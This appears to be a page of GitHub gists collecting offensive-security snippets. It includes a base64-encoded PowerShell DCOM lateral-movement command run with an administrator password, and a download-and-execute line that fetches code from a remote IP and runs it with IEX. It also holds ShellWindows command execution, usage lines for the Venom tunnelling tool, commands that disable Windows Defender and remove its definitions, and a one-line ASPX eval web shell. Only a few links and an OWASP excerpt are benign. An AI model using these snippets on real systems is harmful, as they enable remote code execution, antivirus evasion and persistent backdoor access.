ffcommax
/ Bypass 30X redirect with BurpSuite.txt
Created
October 24, 2021 08:39
Bypass 30X redirect with BurpSuite
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://vk9-sec.com/bypass-30x-redirect-with-burpsuite/ | |
| Proxy -> Options -> Intercept Server Responses -> Check box (Intercept responses…) | |
| Now edit “Match and Replace” section | |
| Now add a new rule | |
| Fill in the blanks |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://fakena.me/fake-name/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$hb = | |
| [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.126.134"));$ | |
| hb.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c echo Haboob > C:\hb.txt","7")')) | |
| Invoke-RunasCs -Domain test -Username administrator -Password P@ssw0rd -Command "powershell | |
| -e | |
| JABoAGIAIAA9ACAAWwBhAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4Acw | |
| B0AGEAbgBjAGUAKABbAHQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAFAAcgB | |
| vAGcASQBEACgAIgBNAE0AQwAyADAALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AIgAsACIAMQA5AD | |
| IALgAxADYAOAAuADEAMgA2AC4AMQAzADQAIgApACkAOwAkAGgAYgAuAEQAbwBjAHUAbQBlAG4A |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://www.exploit-db.com/docs/48767 | |
| Msxml2.XMLHTTP.3.0 | |
| $o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://87.236.212.22:443/xsllsx", $False); $o.Send(); IEX $o.responseText; | |
| ShellWindows | |
| $hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) | |
| $item = $hb.Item() | |
| $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site:exploit-db.com Haboob Team |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/Dliv3/Venom | |
| https://github.com/Dliv3/Venom/releases | |
| ./admin_linux_x64 -lport 8080 | |
| .\Aegis.exe -rhost ip -rport 8080 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://awesomeopensource.com/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://owasp.org/Top10/A00-about-owasp/ | |
| Broken_Access_Control | |
| Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits. Common access control vulnerabilities include: | |
| Bypassing access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool. | |
| Allowing the primary key to be changed to another user's record, permitting viewing or editing someone else's account. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Disable realtime monitoring altogether | |
| Set-MpPreference -DisableRealtimeMonitoring $true | |
| # Only disables scanning for downloaded files or attachments | |
| Set-MpPreference -DisableIOAVProtection $true | |
| Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads\SuperLegitDownloadDirectory" | |
| "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script language='JScript' runat='server'> | |
| function Page_Load(){ | |
| eval(Request['exec_code'],'unsafe');Response.End; | |
| } | |
| </script> |